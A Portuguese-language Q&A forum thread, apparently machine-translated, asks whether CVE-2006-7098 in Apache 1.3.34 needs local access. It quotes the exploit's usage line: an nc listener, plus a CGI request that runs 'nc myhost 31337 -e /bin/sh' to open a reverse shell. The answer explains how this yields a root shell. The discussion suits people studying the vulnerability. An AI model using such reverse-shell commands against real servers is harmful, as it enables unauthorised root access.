O CVE 2006-7098 requer acesso (sendo um logado) ao Debian vulnerável?

1

Estou estudando as vulnerabilidades de uma versão antiga do Apache, a 1.3.34. E eu não entendo muito bem em que situação exata a vulnerabilidade do CVE 2006-7098 pode ser explorada. O LEIAME incluído no exploit afirma que:

Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.

Usage: nc -vvv -l -p 31337 http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d

No início, entendi que a vulnerabilidade poderia ser explorada de outra máquina na mesma rede do servidor vulnerável. Então desta outra máquina (atacante) eu:

  • compilou o exploit cgipwn e instalou-o no cgi-bin do atacador máquina apache.
  • executou o comando nc da máquina atacante especificando -p como a porta onde o atacante apache atende, servidor da web como o IP da máquina invasora e myhost como o servidor com a vulnerabilidade.

Mas não consegui: o comando simplesmente não retorna nada.

Então, depois de reler a informação de exploração várias vezes, tenho certas dúvidas sobre a frase local atacante : significa que a vulnerabilidade só pode ser explorada da mesma máquina onde o vulnerável Apache é corrida? Nesse caso, entendo que o invasor deve ter a priori as credenciais de um usuário válido na máquina com permissões para gerenciar o apache (o que reduziria muito a aplicabilidade do ataque).

Poderia algum corpo lançar alguma luz sobre isso?

    
por Toni 03.06.2015 / 13:03

1 resposta

1

So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).

Sim, você está certo. Na verdade, webserver é um servidor de destino com essa vulnerabilidade, myhost é uma máquina do invasor.

Colocando cgipwn binary no diretório webserver /cgi-bin e abrindo http://webserver/cgi-bin/cgipwn?... , o atacante tenta executar nc myhost 31337 /bin/sh on webserver , como um usuário que iniciou o Apache (geralmente root ).

O atacante executa anteriormente nc -vvv -l -p 31337 em myhost para aceitar essa nc conexão de webserver . Se tudo correr bem, o invasor terá acesso a uma sessão interativa de /bin/sh executando como usuário inicial do Apache em webserver .

    
por 03.06.2015 / 13:44